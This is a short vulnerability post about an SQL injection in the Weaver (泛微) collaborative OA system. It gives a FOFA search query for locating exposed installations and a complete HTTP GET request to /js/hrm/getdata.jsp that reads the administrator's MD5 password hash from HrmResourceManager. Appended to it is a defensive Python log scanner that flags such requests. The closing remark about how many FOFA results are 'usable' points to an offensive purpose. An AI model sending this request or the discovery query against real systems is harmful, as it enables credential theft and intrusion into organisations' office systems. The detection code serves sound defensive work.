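0x00 Vulnerability Description

An injection vulnerability can be used to obtain the system administrator's encrypted (MD5) password value.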

0x01 FOFA Query

app="泛微-协同办公OA"

0x02 Vulnerability Details

    GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
    Host: IP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Referer: http://IP/login/Login.jsp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=abcKPQwz8VeaP9hDLT5Ix; testBanCookie=test
    Connection: close
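
Added example (not part of the original post): a log check for defenders that flags any request to the endpoint shown above that carries a sql parameter, and raises the severity when the query references HrmResourceManager. The log lines are constructed samples in combined log format; the case-insensitive path and parameter matching is an assumption about how the server resolves them.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Apr/2021:10:01:22 +0800] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1" 200 45 "http://IP/login/Login.jsp" "Mozilla/5.0"
203.0.113.9 - - [12/Apr/2021:10:02:03 +0800] "GET /login/Login.jsp HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Apr/2021:10:03:40 +0800] "GET /JS/hrm/GetData.jsp?CMD=getSelectAllId&SQL=select+1+as+id HTTP/1.1" 200 12 "-" "curl/7.68.0"
203.0.113.9 - - [12/Apr/2021:10:04:11 +0800] "GET /js/hrm/getdata.jsp?cmd=other HTTP/1.1" 200 30 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TARGET_PATH = "/js/hrm/getdata.jsp"


def classify(line):
    """Return a finding dict if the line is a getdata.jsp request carrying `sql`."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    parts = urlsplit(target)
    # Assumption: path and parameter names are matched case-insensitively.
    if unquote(parts.path).lower() != TARGET_PATH:
        return None
    params = {k.lower(): v
              for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if "sql" not in params:
        return None  # the endpoint was hit, but no client-supplied SQL
    sql = " ".join(params["sql"])  # parse_qs has already URL-decoded the value
    severity = "high" if "hrmresourcemanager" in sql.lower() else "medium"
    return {"client": client, "time": when, "status": int(status),
            "sql": sql, "severity": severity}


def scan(text):
    """Run classify() over every log line and keep the findings."""
    return [hit for hit in map(classify, text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "high" finding with status 200 means the administrator hash should be treated as disclosed and the password rotated.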

0x03 Summary

Very few of the results on FOFA are actually usable.